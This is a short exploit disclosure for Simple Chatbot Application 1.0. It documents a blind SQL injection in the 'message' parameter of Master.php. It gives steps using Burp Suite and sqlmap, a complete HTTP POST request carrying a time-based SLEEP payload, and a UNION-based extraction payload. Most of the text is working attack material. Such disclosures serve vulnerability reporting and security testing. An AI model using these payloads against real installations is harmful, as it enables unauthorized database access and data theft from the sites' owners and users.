# Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi# Date: 18/01/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html# Version: 1.0# Tested on: XAMPP, Windows 10# Steps# Go to : http://127.0.0.1/classes/Master.php?f=get_response# Save request in BurpSuite# Run saved request with sqlmap -r sql.txt======
POST /classes/Master.php?f=get_response HTTP/1.1
Host:127.0.0.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length:73
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud
======#Payloads#Payload (UNION query)
message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL---#(AND/OR time-based blind)
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud
